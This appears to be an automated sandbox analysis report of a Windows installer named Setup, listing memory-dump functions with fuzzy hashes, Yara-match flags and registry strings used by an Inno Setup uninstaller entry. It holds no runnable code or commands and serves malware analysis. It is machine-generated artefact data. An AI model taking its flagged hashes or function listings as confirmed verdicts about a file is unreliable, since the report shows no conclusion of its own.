Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b28b4d560e54a04dbe08f5ecee26e2f01bb98b968d4a90e4e8c422b7f26c68f9
Instruction ID: 1d111d9c49715771984b42ad9fb1c9f87b25856ce880fd033e0f0cda5fbdd090
Opcode Fuzzy Hash: b28b4d560e54a04dbe08f5ecee26e2f01bb98b968d4a90e4e8c422b7f26c68f9
Instruction Fuzzy Hash: 93513D71A00108EFDB44DFAAC991E9EB3F9EB48300F6091AAF405D7355DA35EE419B18

Function 00430FEC Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d64e4b7af2cdc12e34017ef11057120cd9225e796532e3282856bd5d4a50035
Instruction ID: b3869ca692f8058704d57438d8df0caa720eb237734c8cc26e8d831c1f3283d5
Opcode Fuzzy Hash: 2d64e4b7af2cdc12e34017ef11057120cd9225e796532e3282856bd5d4a50035
Instruction Fuzzy Hash: 34519B76E543208FC358EFBEEC8615A3762FBB4309346953F9446C6265CE385D428A8E

Function 02FC410B Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5095b11813d37b96035c9b9994fbc474ce74de39ae02851956cf2284566cb88
Instruction ID: ad6103771f48327458266dc2974234c02fa2928038c3d2ed1777d0e16d10f357
Opcode Fuzzy Hash: a5095b11813d37b96035c9b9994fbc474ce74de39ae02851956cf2284566cb88
Instruction Fuzzy Hash: 3A41CD75A087A24BC325CF3D8C6017ABBD2BBDA208B5DC5BCD8EA97742D634C944C791

Function 02FCA320 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b90a6dc72c44aa90688fde42a0f2d888ce8c1965589363d019778d0e9ce844c
Instruction ID: 25487aeb046fda98b337900d786cfeeec7a3b25fe6597f883bd9de2d14e6c4ac
Opcode Fuzzy Hash: 9b90a6dc72c44aa90688fde42a0f2d888ce8c1965589363d019778d0e9ce844c
Instruction Fuzzy Hash: 0541A37250C3658FD324DF58D4507AFB7E2EBC5304F054A2CE9E9AB281E7749A098BC6

Function 00430A7C Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21918e67c9e9c427c6e3a22c6aa0a8965ee0f50723e96a290b12056538ed353e
Instruction ID: ca1f2c28f6d2ff7ce0a08a1d80fd542a8ab0f2e0ada4e80ac1ce149aff32bb21
Opcode Fuzzy Hash: 21918e67c9e9c427c6e3a22c6aa0a8965ee0f50723e96a290b12056538ed353e
Instruction Fuzzy Hash: E1412B77D503154B9718EFFEDC8616A7262F7E4326301C23F9802970AADA7C5C058A8E

Function 00430A9C Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ac1d70e5d85e5e0c5455b9553c3aa566dbe025d29fca08daef966991aa443d2
Instruction ID: d0dc5ffbb1ead291018abdf52b1df84355d25cabb8abc3689be3c61a3d157a2b
Opcode Fuzzy Hash: 8ac1d70e5d85e5e0c5455b9553c3aa566dbe025d29fca08daef966991aa443d2
Instruction Fuzzy Hash: E0412977D503154B9718EFBEDC9756A7762F7E0329301C23F9803970AADA786C058A8E

Function 00430868 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
String ID:
API String ID: 4130936913-0
Opcode ID: 49567698caa15ac020c14ed55eb076575c845d3d8491c9bfed3e1ef36c4b43c0
Instruction ID: b24b1e7165df9ed8cd5285081694dfc29e005be3a6d1748bc6f61e3e8cd3942d
Opcode Fuzzy Hash: 49567698caa15ac020c14ed55eb076575c845d3d8491c9bfed3e1ef36c4b43c0
Instruction Fuzzy Hash: 26415977A106248B9A58EFBDEC5216D72529BF4319782233FE451D3667CF388D8086CE

Function 02FCB6DC Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e377642fb7beb852b51c59da23db0aa98be1979ac2613db8d6de9667197ebff
Instruction ID: 761e68fb8f7e6feae9a64c33714e4bc05133dba48eaacff2983479072ccebcbd
Opcode Fuzzy Hash: 0e377642fb7beb852b51c59da23db0aa98be1979ac2613db8d6de9667197ebff
Instruction Fuzzy Hash: A231233DB092028BD718DF20D98257A73A3FFD62ACF28953CDA4643691CB309802CB09

Function 02FA0FC1 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
Instruction ID: 8ef8d916a6e452d7c0db83ca76bf6675a18e6062e858c62874ee27c73c58be99
Opcode Fuzzy Hash: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
Instruction Fuzzy Hash: FE5193B4E00209DFCB08CF88C591AAEB7B1FF88314F258199D915AB355D731AE41CFA4

Function 00431290 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a97f71b6e95fda9942817d76c6401e15182ac005edd34e948ddc631c61a2c7cb
Instruction ID: 3b0a4ced5011c713963cb1f6e9780c054784d2486a049db19e3b0c9f8ab2a380
Opcode Fuzzy Hash: a97f71b6e95fda9942817d76c6401e15182ac005edd34e948ddc631c61a2c7cb
Instruction Fuzzy Hash: EE2109329147254B9B45EF7EED4A10E3252FB90318781963FD546CB11AEA384D43859F

Function 00431494 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f150552cc43b38c9a04efbd5f9b19310edf5a58300861ec23308f23de792363
Instruction ID: b8f54807face7033f1650da760020475f8e283f76f387fa86adbc0032b284132
Opcode Fuzzy Hash: 4f150552cc43b38c9a04efbd5f9b19310edf5a58300861ec23308f23de792363
Instruction Fuzzy Hash: 3631B1728113148BD358FF3EEC5606A3AA1F7A4344382823FE457C3565CF385D428A8E

Function 02FC6797 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55b8d99aeb0211b9c271d63da0d35b3a6f40bcab9e9156c15a009b4482be6712
Instruction ID: f2affc9cfd2d84b279e3b05c78b123fa6229e989ef336fcd68e7dc9bdf748a86
Opcode Fuzzy Hash: 55b8d99aeb0211b9c271d63da0d35b3a6f40bcab9e9156c15a009b4482be6712
Instruction Fuzzy Hash: 55219A71A4C2168BE718DF21D00162BB7F2AFC2B41F18C85CE481DB284D738C9468FA2

Function 02FDC94E Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6115dc82064a9ccddac82ccc702657e59513d4755e76f6eacd17fee9f00ac50c
Instruction ID: de55b9c3647806f90406346051448384bfc531f1bf1748915f421bdee9ee9fbb
Opcode Fuzzy Hash: 6115dc82064a9ccddac82ccc702657e59513d4755e76f6eacd17fee9f00ac50c
Instruction Fuzzy Hash: A511AB37A443045BC3109E55EC40A6BBBA7EBCA2A9F0E452DE7C8536A0E731DC01E691

Function 004312E8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b32983bc06e080bfc17d6631132ce76c23326324e7c7050bc908ca57f83f8df
Instruction ID: d01492db8c1f004f02e13ba13d001806fce64d3baf6e7853add89d63d76ecabf
Opcode Fuzzy Hash: 3b32983bc06e080bfc17d6631132ce76c23326324e7c7050bc908ca57f83f8df
Instruction Fuzzy Hash: 2B1124329147794B9B06EF7EED8A00E3241FB90318781963FA443CB11AEA3C0903459F

Function 02FB798A Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50c3ccfc71088cf23dec348eb0cd19728f18b69afd6aa55d584ab8bbde8ad2a9
Instruction ID: a069b30ab617607abffb674c180757dccd6f064727514593c13a8f0b15e45125
Opcode Fuzzy Hash: 50c3ccfc71088cf23dec348eb0cd19728f18b69afd6aa55d584ab8bbde8ad2a9
Instruction Fuzzy Hash: 4A115972E486418FC764AF25DC44777B2E2ABC7302F39683CD582D36A4EB34A802C645

Function 0043138C Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c32a14ac9c78f241c61cfd5eed6010f79d018346075c2168e3834c0d9964947
Instruction ID: ead133db318c954511071470bb1ddc84143c4d7b526f6364c5e87bff65405683
Opcode Fuzzy Hash: 5c32a14ac9c78f241c61cfd5eed6010f79d018346075c2168e3834c0d9964947
Instruction Fuzzy Hash: A711E6325147618FA309EFBBEC8606A37A1F7A0328755963FD403CB562CB3C5943968E

Function 02FA0FC0 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
Instruction ID: 1a1fedb197bf9e3bab6f3902c4caabe5ca43dda04cf5f2a8e8cce1aae4eb2c2e
Opcode Fuzzy Hash: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
Instruction Fuzzy Hash: 0F3182B4E00119DFCB08CF98C591AAEBBB1FF48314F248599D915AB345D375AE82CF94

Function 02FD5FFE Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: acd42ff195c79117741b7d14b588a8a8f602180855e180c11ccac7eb28072304
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: F911E533B051D04EC326CE3C9804565BFA70A97979F9D8399F6F8DB2D2C6278D8A8350

Function 02FCC16E Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 610709665eac29b094517c49a385c4a9102b2ba4271f1c120e58bafbe1147773
Instruction ID: 1ad50729accf7bab52f52a4a86035b96032d8429589a032cfd3f15356316acd0
Opcode Fuzzy Hash: 610709665eac29b094517c49a385c4a9102b2ba4271f1c120e58bafbe1147773
Instruction Fuzzy Hash: FA01D4F1B0170247F7219F568AC473BB2AAAFA0784F28003ECA4D97300DB72E8149A91

Function 02FCAAAE Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b15cb587d4a79bf95c80d12401e71116f03d0c5a0434d12a4b5e0e243d7a89bb
Instruction ID: bdaaeb657426909d7530c3ea61cf4bced2b57da7d80da581a3e494f2ecb0d660
Opcode Fuzzy Hash: b15cb587d4a79bf95c80d12401e71116f03d0c5a0434d12a4b5e0e243d7a89bb
Instruction Fuzzy Hash: 10118C79A487149FD320CF54C9C0A6AB3B2FB8A344F14587CEA9497222C730ED09CB96

Function 02FC3E32 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f66a58018fc7560d941e78c034ea9d642c0c60e1f0446766c458f6e6a457e0
Instruction ID: 69f6d07bea97cd1c046bdcb29ffe58e560b4f763c0d795ad47c5670f4a42abbd
Opcode Fuzzy Hash: f5f66a58018fc7560d941e78c034ea9d642c0c60e1f0446766c458f6e6a457e0
Instruction Fuzzy Hash: 421108B8B442014BE7148F258D1173BB7E2EBCA768F24D53CE581A7690CA30D8008B05

Function 02FA43BE Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68bae6648a43b8bf7183a593b6c23035bbb1b4639a6195518a97e0b76609f489
Instruction ID: 8ee35b1e29588f53026ae41718f54e95718d8dfa9482b621ef0c9123c56b0232
Opcode Fuzzy Hash: 68bae6648a43b8bf7183a593b6c23035bbb1b4639a6195518a97e0b76609f489
Instruction Fuzzy Hash: 67F046BBB293190B9210DEB9ECD0A27B392D7C5248F0A4138DF40C3201E5B2E80592A4

Function 02FCEBAD Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5a32f734b6c1aa8d9b01235034392b5ecab33f24e44e5adb51b56c435098b2b
Instruction ID: 87947f60f328127e49af71ec5e12b5aad6c807c7b52dbeebe25e84e5a42025c8
Opcode Fuzzy Hash: b5a32f734b6c1aa8d9b01235034392b5ecab33f24e44e5adb51b56c435098b2b
Instruction Fuzzy Hash: 75F090745082C38BE7228F398520772FFE0EB63644F2869D9D1E7DB282C3289481C759

Function 02FDE7EE Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f82463bf35f6f81a6a70b41c88b031b5ff54ece0df9a954b069454a2c0903b1d
Instruction ID: 091b0a1d5d87a55438839c99d5aa869f1abe3873733233c3e9b3f076ed2e148f
Opcode Fuzzy Hash: f82463bf35f6f81a6a70b41c88b031b5ff54ece0df9a954b069454a2c0903b1d
Instruction Fuzzy Hash: 65F0E234A081485FEB089F75D8669FF7BB9DB4B750F14A03CE54263281DA30A942D768

Function 02FB595E Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bd8f026ff2f397704cb218e7681bb492412db8f37b4dd87d1e1d4ee93aabf6a
Instruction ID: 34431702c07cb53b23510844a53014c2a3c872e3031f4dc222b4118870325d88
Opcode Fuzzy Hash: 8bd8f026ff2f397704cb218e7681bb492412db8f37b4dd87d1e1d4ee93aabf6a
Instruction Fuzzy Hash: DEE09221F5A2008AD70C9E3A983036AE5E387D6223F2DC8BC8083D3288C87884424615

Function 02FCB65D Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63428e3e4e3619acb872afe8e29cef315fc2e9519b388901fb1099548b5f64ee
Instruction ID: 738a419799383f7f5a4cbad32fb4adca48cf1c4989dfd8ee41c656cbb4dcaa7c
Opcode Fuzzy Hash: 63428e3e4e3619acb872afe8e29cef315fc2e9519b388901fb1099548b5f64ee
Instruction Fuzzy Hash: B2E0D8F1D092017BFA016F508C01F27B5A6DF96340F041434F609361A1E561E5504E97

Function 02FAB868 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 736697a942bd40318665546f5beea6e8e0548c8d2f171b0257dd91809836a777
Instruction ID: 3986dd61e1e459dde570713cc258720619c3ecaa6dd2440b1e202a7d4929d81d
Opcode Fuzzy Hash: 736697a942bd40318665546f5beea6e8e0548c8d2f171b0257dd91809836a777
Instruction Fuzzy Hash: F2E04FB8808201CBC714DF08C871672B3B1EF5A78AF00285DE882CB360E3389545DB1D

Function 02FC89BD Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 293bf3efa7a299541f233593cd42cec358577341be402a35cd2cd03133335ee8
Instruction ID: 5cc7ca7ddb56dc67376eff5942e1558e3f4f1349c89135f623042267026ee5fa
Opcode Fuzzy Hash: 293bf3efa7a299541f233593cd42cec358577341be402a35cd2cd03133335ee8
Instruction Fuzzy Hash: DCD05E00A0CB5B878B1F0E9946F5236A6670B07AD972854BF96D39BC83D706C806865D

Function 02FC42C0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57e0045c845c3bfeb7712030295021064aa9420922567f0bf37cccd446aee5b8
Instruction ID: a1516393f705c2da136e017ba7b23723c6e4c61dc78b2060792914a5333d7b05
Opcode Fuzzy Hash: 57e0045c845c3bfeb7712030295021064aa9420922567f0bf37cccd446aee5b8
Instruction Fuzzy Hash: 1FD017758146049FC700BF10EC00A2CBBE3BB57302F485438E85AA3320EA329A288F19

Function 02FAB7E3 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 539ba414b7b2dcea4b8a545e00631e1ae21b96038eac56eada3ddf7038b56721
Instruction ID: 30b24ba7414dd68909bbdf87bfec220448337b97d4f0e973103b6bfeea2960e8
Opcode Fuzzy Hash: 539ba414b7b2dcea4b8a545e00631e1ae21b96038eac56eada3ddf7038b56721
Instruction Fuzzy Hash: E8C0123461B2809FE308CF24A8815A7B6335BD3505E2C553DC8C117217D1319515832E

Function 02FAB6FF Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5428a3f4d637f55dd33f4135330e2b7b0f742cf5d4c0f005aa732dc7209f0901
Instruction ID: 92f192feb3868a1fe7fa7ddfa356edc70fceff1276b968627ac982d634d2eaac
Opcode Fuzzy Hash: 5428a3f4d637f55dd33f4135330e2b7b0f742cf5d4c0f005aa732dc7209f0901
Instruction Fuzzy Hash: B4C0927EA48080DB8648CF08ECA1D32E739A76B70BB0038399503E3262C734D501CA0C

Function 0046E1D0 Relevance: 72.2, APIs: 1, Strings: 40, Instructions: 488registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0046DFBC: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,;QG,?,0049B178,?,0046E2D3,?,00000000,0046E840,?,_is1), ref: 0046DFDF

RegCloseKey.ADVAPI32(?,0046E847,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046E892,?,?,0049B178,00000000), ref: 0046E83A

Strings

UninstallString, xrefs: 0046E525
Publisher, xrefs: 0046E599
ModifyPath, xrefs: 0046E684
HelpTelephone, xrefs: 0046E5D3
Software\Microsoft\Windows\CurrentVersion\Uninstall\, xrefs: 0046E226
Inno Setup: Setup Version, xrefs: 0046E2C1
RegisterPreviousData, xrefs: 0046E7F0
Comments, xrefs: 0046E664
Inno Setup: Selected Components, xrefs: 0046E3A0
DisplayName, xrefs: 0046E4CE
Inno Setup: Deselected Components, xrefs: 0046E3BF
Inno Setup: User Info: Organization, xrefs: 0046E433
NoRepair, xrefs: 0046E6AC
DisplayIcon, xrefs: 0046E4EB
Inno Setup: User Info: Name, xrefs: 0046E41E
Inno Setup: Language, xrefs: 0046E46F
" /SILENT, xrefs: 0046E552
Readme, xrefs: 0046E62A
Inno Setup: Icon Group, xrefs: 0046E325
InstallDate, xrefs: 0046E6CB
_is1, xrefs: 0046E22C
NoModify, xrefs: 0046E698
DisplayVersion, xrefs: 0046E57C
